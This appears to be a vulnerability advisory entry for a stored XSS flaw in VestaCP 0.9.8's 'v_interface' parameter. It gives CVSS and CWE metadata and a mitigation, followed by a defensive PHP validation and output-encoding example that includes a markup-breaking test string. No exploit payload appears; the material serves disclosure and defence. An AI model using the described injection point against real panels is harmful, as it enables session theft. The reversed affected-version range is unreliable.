Vendor: VestaCP
By: Numan Türle
CVSS: 8.8 (HIGH)
Stored XSS
CWE: 79
Product Name: VestaCP
Affected Version From: 0.9.8-26-43
Affected Version To: 0.9.8-26
Patch Exists: YES
Related CWE: N/A
CPE: a:vestacp:vestacp:0.9.8-26-43
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: VestaCP
2021
VestaCP 0.9.8 – ‘v_interface’ Add IP Stored XSS
VestaCP 0.9.8 is vulnerable to stored XSS in the 'v_interface' parameter of the 'add/ip/' POST request. An attacker can inject malicious JavaScript code into the 'v_interface' parameter, which will be executed when the user visits the 'add/ip/' page.
Mitigation:
Input validation should be used to prevent malicious code from being injected into the 'v_interface' parameter. Additionally, the application should be updated to the latest version of VestaCP.
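
The mitigation above as an added example (not VestaCP's own code): an allowlist check for 'v_interface' on input, paired with HTML encoding when the value is rendered, because a stored value is only harmless if it is also escaped on output. The function names, the allowed character set and the sample inputs are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Added example, not VestaCP source. Function names are hypothetical.
// Requires PHP 8.0+ (uses the `mixed` type).

const IFNAME_MAX = 15; // Linux IFNAMSIZ is 16 bytes including the trailing NUL

/**
 * Return the value only if it looks like a Linux interface name and, when a
 * list of known interfaces is supplied, only if it is present in that list.
 */
function validate_interface(mixed $value, array $known = []): ?string
{
    if (!is_string($value)) {
        return null; // e.g. v_interface[]=... arrives as an array
    }
    // Assumed allowlist: letters, digits, '_', '.', ':', '-'
    $pattern = '/\A[A-Za-z0-9_.:-]{1,' . IFNAME_MAX . '}\z/';
    if (preg_match($pattern, $value) !== 1) {
        return null;
    }
    if ($known !== [] && !in_array($value, $known, true)) {
        return null;
    }
    return $value;
}

/** Encode at render time, even for values that passed validation. */
function render_interface_option(string $value): string
{
    $safe = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<option value="' . $safe . '">' . $safe . '</option>';
}

// Constructed sample inputs (not taken from the advisory)
$known   = ['eth0', 'eth0:1', 'ens3'];
$samples = ['eth0', 'eth0:1', 'wlan0', '"><b>x</b>', ['eth0'], str_repeat('a', 16)];

foreach ($samples as $s) {
    $ok = validate_interface($s, $known);
    printf("%-24s => %s\n", json_encode($s), $ok === null ? 'rejected' : 'accepted');
}

// Markup characters in an already-stored value come out as entities.
echo render_interface_option('"><b>x</b>'), "\n";
```

Only the first two samples are accepted; 'wlan0' is well-formed but fails the known-interface check, and the remaining three fail the type, character or length test.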